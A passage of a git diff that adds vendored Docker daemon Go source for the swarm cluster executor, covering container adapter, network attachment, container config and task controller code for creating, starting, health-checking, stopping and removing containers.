(types.ContainerJSON, error) { + cs, err := c.backend.ContainerInspectCurrent(c.container.name(), false) + if ctx.Err() != nil { + return types.ContainerJSON{}, ctx.Err() + } + if err != nil { + return types.ContainerJSON{}, err + } + return *cs, nil +} + +// events issues a call to the events API and returns a channel with all +// events. The stream of events can be shutdown by cancelling the context. +func (c *containerAdapter) events(ctx context.Context) <-chan events.Message { + log.G(ctx).Debugf("waiting on events") + buffer, l := c.backend.SubscribeToEvents(time.Time{}, time.Time{}, c.container.eventFilter()) + eventsq := make(chan events.Message, len(buffer)) + + for _, event := range buffer { + eventsq <- event + } + + go func() { + defer c.backend.UnsubscribeFromEvents(l) + + for { + select { + case ev := <-l: + jev, ok := ev.(events.Message) + if !ok { + log.G(ctx).Warnf("unexpected event message: %q", ev) + continue + } + select { + case eventsq <- jev: + case <-ctx.Done(): + return + } + case <-ctx.Done(): + return + } + } + }() + + return eventsq +} + +func (c *containerAdapter) wait(ctx context.Context) error { + return c.backend.ContainerWaitWithContext(ctx, c.container.nameOrID()) +} + +func (c *containerAdapter) shutdown(ctx context.Context) error { + // Default stop grace period to nil (daemon will use the stopTimeout of the container) + var stopgrace *int + spec := c.container.spec() + if spec.StopGracePeriod != nil { + stopgraceValue := int(spec.StopGracePeriod.Seconds) + stopgrace = &stopgraceValue + } + return c.backend.ContainerStop(c.container.name(), stopgrace) +} + +func (c *containerAdapter) terminate(ctx context.Context) error { + return c.backend.ContainerKill(c.container.name(), uint64(syscall.SIGKILL)) +} + +func (c *containerAdapter) remove(ctx context.Context) error { + return c.backend.ContainerRm(c.container.name(), &types.ContainerRmConfig{ + RemoveVolume: true, + ForceRemove: true, + }) +} + +func (c *containerAdapter) createVolumes(ctx context.Context) error { + // Create plugin volumes that are embedded inside a Mount + for _, mount := range c.container.task.Spec.GetContainer().Mounts { + if mount.Type != api.MountTypeVolume { + continue + } + + if mount.VolumeOptions == nil { + continue + } + + if mount.VolumeOptions.DriverConfig == nil { + continue + } + + req := c.container.volumeCreateRequest(&mount) + + // Check if this volume exists on the engine + if _, err := c.backend.VolumeCreate(req.Name, req.Driver, req.DriverOpts, req.Labels); err != nil { + // TODO(amitshukla): Today, volume create through the engine api does not return an error + // when the named volume with the same parameters already exists. + // It returns an error if the driver name is different - that is a valid error + return err + } + + } + + return nil +} + +func (c *containerAdapter) activateServiceBinding() error { + return c.backend.ActivateContainerServiceBinding(c.container.name()) +} + +func (c *containerAdapter) deactivateServiceBinding() error { + return c.backend.DeactivateContainerServiceBinding(c.container.name()) +} + +func (c *containerAdapter) logs(ctx context.Context, options api.LogSubscriptionOptions) (io.ReadCloser, error) { + reader, writer := io.Pipe() + + apiOptions := &backend.ContainerLogsConfig{ + ContainerLogsOptions: types.ContainerLogsOptions{ + Follow: options.Follow, + + // TODO(stevvooe): Parse timestamp out of message. This + // absolutely needs to be done before going to production with + // this, at it is completely redundant. + Timestamps: true, + Details: false, // no clue what to do with this, let's just deprecate it. + }, + OutStream: writer, + } + + if options.Since != nil { + since, err := ptypes.Timestamp(options.Since) + if err != nil { + return nil, err + } + apiOptions.Since = since.Format(time.RFC3339Nano) + } + + if options.Tail < 0 { + // See protobuf documentation for details of how this works. + apiOptions.Tail = fmt.Sprint(-options.Tail - 1) + } else if options.Tail > 0 { + return nil, fmt.Errorf("tail relative to start of logs not supported via docker API") + } + + if len(options.Streams) == 0 { + // empty == all + apiOptions.ShowStdout, apiOptions.ShowStderr = true, true + } else { + for _, stream := range options.Streams { + switch stream { + case api.LogStreamStdout: + apiOptions.ShowStdout = true + case api.LogStreamStderr: + apiOptions.ShowStderr = true + } + } + } + + chStarted := make(chan struct{}) + go func() { + defer writer.Close() + c.backend.ContainerLogs(ctx, c.container.name(), apiOptions, chStarted) + }() + + return reader, nil +} + +// todo: typed/wrapped errors +func isContainerCreateNameConflict(err error) bool { + return strings.Contains(err.Error(), "Conflict. The name") +} + +func isUnknownContainer(err error) bool { + return strings.Contains(err.Error(), "No such container:") +} + +func isStoppedContainer(err error) bool { + return strings.Contains(err.Error(), "is already stopped") +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go new file mode 100644 index 0000000000..e0ee81a8b9 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go @@ -0,0 +1,81 @@ +package container + +import ( + executorpkg "github.com/docker/docker/daemon/cluster/executor" + "github.com/docker/swarmkit/agent/exec" + "github.com/docker/swarmkit/api" + "golang.org/x/net/context" +) + +// networkAttacherController implements agent.Controller against docker's API. +// +// networkAttacherController manages the lifecycle of network +// attachment of a docker unmanaged container managed as a task from +// agent point of view. It provides network attachment information to +// the unmanaged container for it to attach to the network and run. +type networkAttacherController struct { + backend executorpkg.Backend + task *api.Task + adapter *containerAdapter + closed chan struct{} +} + +func newNetworkAttacherController(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*networkAttacherController, error) { + adapter, err := newContainerAdapter(b, task, secrets) + if err != nil { + return nil, err + } + + return &networkAttacherController{ + backend: b, + task: task, + adapter: adapter, + closed: make(chan struct{}), + }, nil +} + +func (nc *networkAttacherController) Update(ctx context.Context, t *api.Task) error { + return nil +} + +func (nc *networkAttacherController) Prepare(ctx context.Context) error { + // Make sure all the networks that the task needs are created. + if err := nc.adapter.createNetworks(ctx); err != nil { + return err + } + + return nil +} + +func (nc *networkAttacherController) Start(ctx context.Context) error { + return nc.adapter.networkAttach(ctx) +} + +func (nc *networkAttacherController) Wait(pctx context.Context) error { + ctx, cancel := context.WithCancel(pctx) + defer cancel() + + return nc.adapter.waitForDetach(ctx) +} + +func (nc *networkAttacherController) Shutdown(ctx context.Context) error { + return nil +} + +func (nc *networkAttacherController) Terminate(ctx context.Context) error { + return nil +} + +func (nc *networkAttacherController) Remove(ctx context.Context) error { + // Try removing the network referenced in this task in case this + // task is the last one referencing it + if err := nc.adapter.removeNetworks(ctx); err != nil { + return err + } + + return nil +} + +func (nc *networkAttacherController) Close() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go new file mode 100644 index 0000000000..f033ad545e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go @@ -0,0 +1,598 @@ +package container + +import ( + "errors" + "fmt" + "net" + "strconv" + "strings" + "time" + + "github.com/Sirupsen/logrus" + + "github.com/docker/docker/api/types" + enginecontainer "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + enginemount "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/network" + volumetypes "github.com/docker/docker/api/types/volume" + clustertypes "github.com/docker/docker/daemon/cluster/provider" + "github.com/docker/docker/reference" + "github.com/docker/go-connections/nat" + "github.com/docker/swarmkit/agent/exec" + "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" + "github.com/docker/swarmkit/template" +) + +const ( + // Explicitly use the kernel's default setting for CPU quota of 100ms. + // https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt + cpuQuotaPeriod = 100 * time.Millisecond + + // systemLabelPrefix represents the reserved namespace for system labels. + systemLabelPrefix = "com.docker.swarm" +) + +// containerConfig converts task properties into docker container compatible +// components. +type containerConfig struct { + task *api.Task + networksAttachments map[string]*api.NetworkAttachment +} + +// newContainerConfig returns a validated container config. No methods should +// return an error if this function returns without error. +func newContainerConfig(t *api.Task) (*containerConfig, error) { + var c containerConfig + return &c, c.setTask(t) +} + +func (c *containerConfig) setTask(t *api.Task) error { + if t.Spec.GetContainer() == nil && t.Spec.GetAttachment() == nil { + return exec.ErrRuntimeUnsupported + } + + container := t.Spec.GetContainer() + if container != nil { + if container.Image == "" { + return ErrImageRequired + } + + if err := validateMounts(container.Mounts); err != nil { + return err + } + } + + // index the networks by name + c.networksAttachments = make(map[string]*api.NetworkAttachment, len(t.Networks)) + for _, attachment := range t.Networks { + c.networksAttachments[attachment.Network.Spec.Annotations.Name] = attachment + } + + c.task = t + + if t.Spec.GetContainer() != nil { + preparedSpec, err := template.ExpandContainerSpec(t) + if err != nil { + return err + } + c.task.Spec.Runtime = &api.TaskSpec_Container{ + Container: preparedSpec, + } + } + + return nil +} + +func (c *containerConfig) id() string { + attachment := c.task.Spec.GetAttachment() + if attachment == nil { + return "" + } + + return attachment.ContainerID +} + +func (c *containerConfig) taskID() string { + return c.task.ID +} + +func (c *containerConfig) endpoint() *api.Endpoint { + return c.task.Endpoint +} + +func (c *containerConfig) spec() *api.ContainerSpec { + return c.task.Spec.GetContainer() +} + +func (c *containerConfig) nameOrID() string { + if c.task.Spec.GetContainer() != nil { + return c.name() + } + + return c.id() +} + +func (c *containerConfig) name() string { + if c.task.Annotations.Name != "" { + // if set, use the container Annotations.Name field, set in the orchestrator. + return c.task.Annotations.Name + } + + slot := fmt.Sprint(c.task.Slot) + if slot == "" || c.task.Slot == 0 { + slot = c.task.NodeID + } + + // fallback to service.slot.id. + return fmt.Sprintf("%s.%s.%s", c.task.ServiceAnnotations.Name, slot, c.task.ID) +} + +func (c *containerConfig) image() string { + raw := c.spec().Image + ref, err := reference.ParseNamed(raw) + if err != nil { + return raw + } + return reference.WithDefaultTag(ref).String() +} + +func (c *containerConfig) portBindings() nat.PortMap { + portBindings := nat.PortMap{} + if c.task.Endpoint == nil { + return portBindings + } + + for _, portConfig := range c.task.Endpoint.Ports { + if portConfig.PublishMode != api.PublishModeHost { + continue + } + + port := nat.Port(fmt.Sprintf("%d/%s", portConfig.TargetPort, strings.ToLower(portConfig.Protocol.String()))) + binding := []nat.PortBinding{ + {}, + } + + if portConfig.PublishedPort != 0 { + binding[0].HostPort = strconv.Itoa(int(portConfig.PublishedPort)) + } + portBindings[port] = binding + } + + return portBindings +} + +func (c *containerConfig) exposedPorts() map[nat.Port]struct{} { + exposedPorts := make(map[nat.Port]struct{}) + if c.task.Endpoint == nil { + return exposedPorts + } + + for _, portConfig := range c.task.Endpoint.Ports { + if portConfig.PublishMode != api.PublishModeHost { + continue + } + + port := nat.Port(fmt.Sprintf("%d/%s", portConfig.TargetPort, strings.ToLower(portConfig.Protocol.String()))) + exposedPorts[port] = struct{}{} + } + + return exposedPorts +} + +func (c *containerConfig) config() *enginecontainer.Config { + config := &enginecontainer.Config{ + Labels: c.labels(), + Tty: c.spec().TTY, + OpenStdin: c.spec().OpenStdin, + User: c.spec().User, + Env: c.spec().Env, + Hostname: c.spec().Hostname, + WorkingDir: c.spec().Dir, + Image: c.image(), + ExposedPorts: c.exposedPorts(), + Healthcheck: c.healthcheck(), + } + + if len(c.spec().Command) > 0 { + // If Command is provided, we replace the whole invocation with Command + // by replacing Entrypoint and specifying Cmd. Args is ignored in this + // case. + config.Entrypoint = append(config.Entrypoint, c.spec().Command...) + config.Cmd = append(config.Cmd, c.spec().Args...) + } else if len(c.spec().Args) > 0 { + // In this case, we assume the image has an Entrypoint and Args + // specifies the arguments for that entrypoint. + config.Cmd = c.spec().Args + } + + return config +} + +func (c *containerConfig) labels() map[string]string { + var ( + system = map[string]string{ + "task": "", // mark as cluster task + "task.id": c.task.ID, + "task.name": c.name(), + "node.id": c.task.NodeID, + "service.id": c.task.ServiceID, + "service.name": c.task.ServiceAnnotations.Name, + } + labels = make(map[string]string) + ) + + // base labels are those defined in the spec. + for k, v := range c.spec().Labels { + labels[k] = v + } + + // we then apply the overrides from the task, which may be set via the + // orchestrator. + for k, v := range c.task.Annotations.Labels { + labels[k] = v + } + + // finally, we apply the system labels, which override all labels. + for k, v := range system { + labels[strings.Join([]string{systemLabelPrefix, k}, ".")] = v + } + + return labels +} + +func (c *containerConfig) mounts() []enginemount.Mount { + var r []enginemount.Mount + for _, mount := range c.spec().Mounts { + r = append(r, convertMount(mount)) + } + return r +} + +func convertMount(m api.Mount) enginemount.Mount { + mount := enginemount.Mount{ + Source: m.Source, + Target: m.Target, + ReadOnly: m.ReadOnly, + } + + switch m.Type { + case api.MountTypeBind: + mount.Type = enginemount.TypeBind + case api.MountTypeVolume: + mount.Type = enginemount.TypeVolume + case api.MountTypeTmpfs: + mount.Type = enginemount.TypeTmpfs + } + + if m.BindOptions != nil { + mount.BindOptions = &enginemount.BindOptions{} + switch m.BindOptions.Propagation { + case api.MountPropagationRPrivate: + mount.BindOptions.Propagation = enginemount.PropagationRPrivate + case api.MountPropagationPrivate: + mount.BindOptions.Propagation = enginemount.PropagationPrivate + case api.MountPropagationRSlave: + mount.BindOptions.Propagation = enginemount.PropagationRSlave + case api.MountPropagationSlave: + mount.BindOptions.Propagation = enginemount.PropagationSlave + case api.MountPropagationRShared: + mount.BindOptions.Propagation = enginemount.PropagationRShared + case api.MountPropagationShared: + mount.BindOptions.Propagation = enginemount.PropagationShared + } + } + + if m.VolumeOptions != nil { + mount.VolumeOptions = &enginemount.VolumeOptions{ + NoCopy: m.VolumeOptions.NoCopy, + } + if m.VolumeOptions.Labels != nil { + mount.VolumeOptions.Labels = make(map[string]string, len(m.VolumeOptions.Labels)) + for k, v := range m.VolumeOptions.Labels { + mount.VolumeOptions.Labels[k] = v + } + } + if m.VolumeOptions.DriverConfig != nil { + mount.VolumeOptions.DriverConfig = &enginemount.Driver{ + Name: m.VolumeOptions.DriverConfig.Name, + } + if m.VolumeOptions.DriverConfig.Options != nil { + mount.VolumeOptions.DriverConfig.Options = make(map[string]string, len(m.VolumeOptions.DriverConfig.Options)) + for k, v := range m.VolumeOptions.DriverConfig.Options { + mount.VolumeOptions.DriverConfig.Options[k] = v + } + } + } + } + + if m.TmpfsOptions != nil { + mount.TmpfsOptions = &enginemount.TmpfsOptions{ + SizeBytes: m.TmpfsOptions.SizeBytes, + Mode: m.TmpfsOptions.Mode, + } + } + + return mount +} + +func (c *containerConfig) healthcheck() *enginecontainer.HealthConfig { + hcSpec := c.spec().Healthcheck + if hcSpec == nil { + return nil + } + interval, _ := ptypes.Duration(hcSpec.Interval) + timeout, _ := ptypes.Duration(hcSpec.Timeout) + return &enginecontainer.HealthConfig{ + Test: hcSpec.Test, + Interval: interval, + Timeout: timeout, + Retries: int(hcSpec.Retries), + } +} + +func (c *containerConfig) hostConfig() *enginecontainer.HostConfig { + hc := &enginecontainer.HostConfig{ + Resources: c.resources(), + GroupAdd: c.spec().Groups, + PortBindings: c.portBindings(), + Mounts: c.mounts(), + } + + if c.spec().DNSConfig != nil { + hc.DNS = c.spec().DNSConfig.Nameservers + hc.DNSSearch = c.spec().DNSConfig.Search + hc.DNSOptions = c.spec().DNSConfig.Options + } + + // The format of extra hosts on swarmkit is specified in: + // http://man7.org/linux/man-pages/man5/hosts.5.html + // IP_address canonical_hostname [aliases...] + // However, the format of ExtraHosts in HostConfig is + // : + // We need to do the conversion here + // (Alias is ignored for now) + for _, entry := range c.spec().Hosts { + parts := strings.Fields(entry) + if len(parts) > 1 { + hc.ExtraHosts = append(hc.ExtraHosts, fmt.Sprintf("%s:%s", parts[1], parts[0])) + } + } + + if c.task.LogDriver != nil { + hc.LogConfig = enginecontainer.LogConfig{ + Type: c.task.LogDriver.Name, + Config: c.task.LogDriver.Options, + } + } + + return hc +} + +// This handles the case of volumes that are defined inside a service Mount +func (c *containerConfig) volumeCreateRequest(mount *api.Mount) *volumetypes.VolumesCreateBody { + var ( + driverName string + driverOpts map[string]string + labels map[string]string + ) + + if mount.VolumeOptions != nil && mount.VolumeOptions.DriverConfig != nil { + driverName = mount.VolumeOptions.DriverConfig.Name + driverOpts = mount.VolumeOptions.DriverConfig.Options + labels = mount.VolumeOptions.Labels + } + + if mount.VolumeOptions != nil { + return &volumetypes.VolumesCreateBody{ + Name: mount.Source, + Driver: driverName, + DriverOpts: driverOpts, + Labels: labels, + } + } + return nil +} + +func (c *containerConfig) resources() enginecontainer.Resources { + resources := enginecontainer.Resources{} + + // If no limits are specified let the engine use its defaults. + // + // TODO(aluzzardi): We might want to set some limits anyway otherwise + // "unlimited" tasks will step over the reservation of other tasks. + r := c.task.Spec.Resources + if r == nil || r.Limits == nil { + return resources + } + + if r.Limits.MemoryBytes > 0 { + resources.Memory = r.Limits.MemoryBytes + } + + if r.Limits.NanoCPUs > 0 { + // CPU Period must be set in microseconds. + resources.CPUPeriod = int64(cpuQuotaPeriod / time.Microsecond) + resources.CPUQuota = r.Limits.NanoCPUs * resources.CPUPeriod / 1e9 + } + + return resources +} + +// Docker daemon supports just 1 network during container create. +func (c *containerConfig) createNetworkingConfig() *network.NetworkingConfig { + var networks []*api.NetworkAttachment + if c.task.Spec.GetContainer() != nil || c.task.Spec.GetAttachment() != nil { + networks = c.task.Networks + } + + epConfig := make(map[string]*network.EndpointSettings) + if len(networks) > 0 { + epConfig[networks[0].Network.Spec.Annotations.Name] = getEndpointConfig(networks[0]) + } + + return &network.NetworkingConfig{EndpointsConfig: epConfig} +} + +// TODO: Merge this function with createNetworkingConfig after daemon supports multiple networks in container create +func (c *containerConfig) connectNetworkingConfig() *network.NetworkingConfig { + var networks []*api.NetworkAttachment + if c.task.Spec.GetContainer() != nil { + networks = c.task.Networks + } + + // First network is used during container create. Other networks are used in "docker network connect" + if len(networks) < 2 { + return nil + } + + epConfig := make(map[string]*network.EndpointSettings) + for _, na := range networks[1:] { + epConfig[na.Network.Spec.Annotations.Name] = getEndpointConfig(na) + } + return &network.NetworkingConfig{EndpointsConfig: epConfig} +} + +func getEndpointConfig(na *api.NetworkAttachment) *network.EndpointSettings { + var ipv4, ipv6 string + for _, addr := range na.Addresses { + ip, _, err := net.ParseCIDR(addr) + if err != nil { + continue + } + + if ip.To4() != nil { + ipv4 = ip.String() + continue + } + + if ip.To16() != nil { + ipv6 = ip.String() + } + } + + return &network.EndpointSettings{ + NetworkID: na.Network.ID, + IPAMConfig: &network.EndpointIPAMConfig{ + IPv4Address: ipv4, + IPv6Address: ipv6, + }, + } +} + +func (c *containerConfig) virtualIP(networkID string) string { + if c.task.Endpoint == nil { + return "" + } + + for _, eVip := range c.task.Endpoint.VirtualIPs { + // We only support IPv4 VIPs for now. + if eVip.NetworkID == networkID { + vip, _, err := net.ParseCIDR(eVip.Addr) + if err != nil { + return "" + } + + return vip.String() + } + } + + return "" +} + +func (c *containerConfig) serviceConfig() *clustertypes.ServiceConfig { + if len(c.task.Networks) == 0 { + return nil + } + + logrus.Debugf("Creating service config in agent for t = %+v", c.task) + svcCfg := &clustertypes.ServiceConfig{ + Name: c.task.ServiceAnnotations.Name, + Aliases: make(map[string][]string), + ID: c.task.ServiceID, + VirtualAddresses: make(map[string]*clustertypes.VirtualAddress), + } + + for _, na := range c.task.Networks { + svcCfg.VirtualAddresses[na.Network.ID] = &clustertypes.VirtualAddress{ + // We support only IPv4 virtual IP for now. + IPv4: c.virtualIP(na.Network.ID), + } + if len(na.Aliases) > 0 { + svcCfg.Aliases[na.Network.ID] = na.Aliases + } + } + + if c.task.Endpoint != nil { + for _, ePort := range c.task.Endpoint.Ports { + if ePort.PublishMode != api.PublishModeIngress { + continue + } + + svcCfg.ExposedPorts = append(svcCfg.ExposedPorts, &clustertypes.PortConfig{ + Name: ePort.Name, + Protocol: int32(ePort.Protocol), + TargetPort: ePort.TargetPort, + PublishedPort: ePort.PublishedPort, + }) + } + } + + return svcCfg +} + +// networks returns a list of network names attached to the container. The +// returned name can be used to lookup the corresponding network create +// options. +func (c *containerConfig) networks() []string { + var networks []string + + for name := range c.networksAttachments { + networks = append(networks, name) + } + + return networks +} + +func (c *containerConfig) networkCreateRequest(name string) (clustertypes.NetworkCreateRequest, error) { + na, ok := c.networksAttachments[name] + if !ok { + return clustertypes.NetworkCreateRequest{}, errors.New("container: unknown network referenced") + } + + options := types.NetworkCreate{ + // ID: na.Network.ID, + Driver: na.Network.DriverState.Name, + IPAM: &network.IPAM{ + Driver: na.Network.IPAM.Driver.Name, + Options: na.Network.IPAM.Driver.Options, + }, + Options: na.Network.DriverState.Options, + Labels: na.Network.Spec.Annotations.Labels, + Internal: na.Network.Spec.Internal, + Attachable: na.Network.Spec.Attachable, + EnableIPv6: na.Network.Spec.Ipv6Enabled, + CheckDuplicate: true, + } + + for _, ic := range na.Network.IPAM.Configs { + c := network.IPAMConfig{ + Subnet: ic.Subnet, + IPRange: ic.Range, + Gateway: ic.Gateway, + } + options.IPAM.Config = append(options.IPAM.Config, c) + } + + return clustertypes.NetworkCreateRequest{na.Network.ID, types.NetworkCreateRequest{Name: name, NetworkCreate: options}}, nil +} + +func (c containerConfig) eventFilter() filters.Args { + filter := filters.NewArgs() + filter.Add("type", events.ContainerEventType) + filter.Add("name", c.name()) + filter.Add("label", fmt.Sprintf("%v.task.id=%v", systemLabelPrefix, c.task.ID)) + return filter +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go new file mode 100644 index 0000000000..75f286a217 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go @@ -0,0 +1,672 @@ +package container + +import ( + "bufio" + "bytes" + "encoding/binary" + "fmt" + "io" + "os" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + executorpkg "github.com/docker/docker/daemon/cluster/executor" + "github.com/docker/go-connections/nat" + "github.com/docker/libnetwork" + "github.com/docker/swarmkit/agent/exec" + "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/log" + "github.com/docker/swarmkit/protobuf/ptypes" + "github.com/pkg/errors" + "golang.org/x/net/context" + "golang.org/x/time/rate" +) + +// controller implements agent.Controller against docker's API. +// +// Most operations against docker's API are done through the container name, +// which is unique to the task. +type controller struct { + task *api.Task + adapter *containerAdapter + closed chan struct{} + err error + + pulled chan struct{} // closed after pull + cancelPull func() // cancels pull context if not nil + pullErr error // pull error, only read after pulled closed +} + +var _ exec.Controller = &controller{} + +// NewController returns a docker exec runner for the provided task. +func newController(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*controller, error) { + adapter, err := newContainerAdapter(b, task, secrets) + if err != nil { + return nil, err + } + + return &controller{ + task: task, + adapter: adapter, + closed: make(chan struct{}), + }, nil +} + +func (r *controller) Task() (*api.Task, error) { + return r.task, nil +} + +// ContainerStatus returns the container-specific status for the task. +func (r *controller) ContainerStatus(ctx context.Context) (*api.ContainerStatus, error) { + ctnr, err := r.adapter.inspect(ctx) + if err != nil { + if isUnknownContainer(err) { + return nil, nil + } + return nil, err + } + return parseContainerStatus(ctnr) +} + +func (r *controller) PortStatus(ctx context.Context) (*api.PortStatus, error) { + ctnr, err := r.adapter.inspect(ctx) + if err != nil { + if isUnknownContainer(err) { + return nil, nil + } + + return nil, err + } + + return parsePortStatus(ctnr) +} + +// Update tasks a recent task update and applies it to the container. +func (r *controller) Update(ctx context.Context, t *api.Task) error { + // TODO(stevvooe): While assignment of tasks is idempotent, we do allow + // updates of metadata, such as labelling, as well as any other properties + // that make sense. + return nil +} + +// Prepare creates a container and ensures the image is pulled. +// +// If the container has already be created, exec.ErrTaskPrepared is returned. +func (r *controller) Prepare(ctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + // Make sure all the networks that the task needs are created. + if err := r.adapter.createNetworks(ctx); err != nil { + return err + } + + // Make sure all the volumes that the task needs are created. + if err := r.adapter.createVolumes(ctx); err != nil { + return err + } + + if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" { + if r.pulled == nil { + // Fork the pull to a different context to allow pull to continue + // on re-entrant calls to Prepare. This ensures that Prepare can be + // idempotent and not incur the extra cost of pulling when + // cancelled on updates. + var pctx context.Context + + r.pulled = make(chan struct{}) + pctx, r.cancelPull = context.WithCancel(context.Background()) // TODO(stevvooe): Bind a context to the entire controller. + + go func() { + defer close(r.pulled) + r.pullErr = r.adapter.pullImage(pctx) // protected by closing r.pulled + }() + } + + select { + case <-ctx.Done(): + return ctx.Err() + case <-r.pulled: + if r.pullErr != nil { + // NOTE(stevvooe): We always try to pull the image to make sure we have + // the most up to date version. This will return an error, but we only + // log it. If the image truly doesn't exist, the create below will + // error out. + // + // This gives us some nice behavior where we use up to date versions of + // mutable tags, but will still run if the old image is available but a + // registry is down. + // + // If you don't want this behavior, lock down your image to an + // immutable tag or digest. + log.G(ctx).WithError(r.pullErr).Error("pulling image failed") + } + } + } + + if err := r.adapter.create(ctx); err != nil { + if isContainerCreateNameConflict(err) { + if _, err := r.adapter.inspect(ctx); err != nil { + return err + } + + // container is already created. success! + return exec.ErrTaskPrepared + } + + return err + } + + return nil +} + +// Start the container. An error will be returned if the container is already started. +func (r *controller) Start(ctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + ctnr, err := r.adapter.inspect(ctx) + if err != nil { + return err + } + + // Detect whether the container has *ever* been started. If so, we don't + // issue the start. + // + // TODO(stevvooe): This is very racy. While reading inspect, another could + // start the process and we could end up starting it twice. + if ctnr.State.Status != "created" { + return exec.ErrTaskStarted + } + + for { + if err := r.adapter.start(ctx); err != nil { + if _, ok := err.(libnetwork.ErrNoSuchNetwork); ok { + // Retry network creation again if we + // failed because some of the networks + // were not found. + if err := r.adapter.createNetworks(ctx); err != nil { + return err + } + + continue + } + + return errors.Wrap(err, "starting container failed") + } + + break + } + + // no health check + if ctnr.Config == nil || ctnr.Config.Healthcheck == nil { + if err := r.adapter.activateServiceBinding(); err != nil { + log.G(ctx).WithError(err).Errorf("failed to activate service binding for container %s which has no healthcheck config", r.adapter.container.name()) + return err + } + return nil + } + + healthCmd := ctnr.Config.Healthcheck.Test + + if len(healthCmd) == 0 || healthCmd[0] == "NONE" { + return nil + } + + // wait for container to be healthy + eventq := r.adapter.events(ctx) + + var healthErr error + for { + select { + case event := <-eventq: + if !r.matchevent(event) { + continue + } + + switch event.Action { + case "die": // exit on terminal events + ctnr, err := r.adapter.inspect(ctx) + if err != nil { + return errors.Wrap(err, "die event received") + } else if ctnr.State.ExitCode != 0 { + return &exitError{code: ctnr.State.ExitCode, cause: healthErr} + } + + return nil + case "destroy": + // If we get here, something has gone wrong but we want to exit + // and report anyways. + return ErrContainerDestroyed + case "health_status: unhealthy": + // in this case, we stop the container and report unhealthy status + if err := r.Shutdown(ctx); err != nil { + return errors.Wrap(err, "unhealthy container shutdown failed") + } + // set health check error, and wait for container to fully exit ("die" event) + healthErr = ErrContainerUnhealthy + case "health_status: healthy": + if err := r.adapter.activateServiceBinding(); err != nil { + log.G(ctx).WithError(err).Errorf("failed to activate service binding for container %s after healthy event", r.adapter.container.name()) + return err + } + return nil + } + case <-ctx.Done(): + return ctx.Err() + case <-r.closed: + return r.err + } + } +} + +// Wait on the container to exit. +func (r *controller) Wait(pctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + ctx, cancel := context.WithCancel(pctx) + defer cancel() + + healthErr := make(chan error, 1) + go func() { + ectx, cancel := context.WithCancel(ctx) // cancel event context on first event + defer cancel() + if err := r.checkHealth(ectx); err == ErrContainerUnhealthy { + healthErr <- ErrContainerUnhealthy + if err := r.Shutdown(ectx); err != nil { + log.G(ectx).WithError(err).Debug("shutdown failed on unhealthy") + } + } + }() + + err := r.adapter.wait(ctx) + if ctx.Err() != nil { + return ctx.Err() + } + + if err != nil { + ee := &exitError{} + if ec, ok := err.(exec.ExitCoder); ok { + ee.code = ec.ExitCode() + } + select { + case e := <-healthErr: + ee.cause = e + default: + if err.Error() != "" { + ee.cause = err + } + } + return ee + } + + return nil +} + +// Shutdown the container cleanly. +func (r *controller) Shutdown(ctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + if r.cancelPull != nil { + r.cancelPull() + } + + // remove container from service binding + if err := r.adapter.deactivateServiceBinding(); err != nil { + log.G(ctx).WithError(err).Errorf("failed to deactivate service binding for container %s", r.adapter.container.name()) + return err + } + + if err := r.adapter.shutdown(ctx); err != nil { + if isUnknownContainer(err) || isStoppedContainer(err) { + return nil + } + + return err + } + + return nil +} + +// Terminate the container, with force. +func (r *controller) Terminate(ctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + if r.cancelPull != nil { + r.cancelPull() + } + + if err := r.adapter.terminate(ctx); err != nil { + if isUnknownContainer(err) { + return nil + } + + return err + } + + return nil +} + +// Remove the container and its resources. +func (r *controller) Remove(ctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + if r.cancelPull != nil { + r.cancelPull() + } + + // It may be necessary to shut down the task before removing it. + if err := r.Shutdown(ctx); err != nil { + if isUnknownContainer(err) { + return nil + } + // This may fail if the task was already shut down. + log.G(ctx).WithError(err).Debug("shutdown failed on removal") + } + + // Try removing networks referenced in this task in case this + // task is the last one referencing it + if err := r.adapter.removeNetworks(ctx); err != nil { + if isUnknownContainer(err) { + return nil + } + return err + } + + if err := r.adapter.remove(ctx); err != nil { + if isUnknownContainer(err) { + return nil + } + + return err + } + return nil +} + +// waitReady waits for a container to be "ready". +// Ready means it's past the started state. +func (r *controller) waitReady(pctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + ctx, cancel := context.WithCancel(pctx) + defer cancel() + + eventq := r.adapter.events(ctx) + + ctnr, err := r.adapter.inspect(ctx) + if err != nil { + if !isUnknownContainer(err) { + return errors.Wrap(err, "inspect container failed") + } + } else { + switch ctnr.State.Status { + case "running", "exited", "dead": + return nil + } + } + + for { + select { + case event := <-eventq: + if !r.matchevent(event) { + continue + } + + switch event.Action { + case "start": + return nil + } + case <-ctx.Done(): + return ctx.Err() + case <-r.closed: + return r.err + } + } +} + +func (r *controller) Logs(ctx context.Context, publisher exec.LogPublisher, options api.LogSubscriptionOptions) error { + if err := r.checkClosed(); err != nil { + return err + } + + if err := r.waitReady(ctx); err != nil { + return errors.Wrap(err, "container not ready for 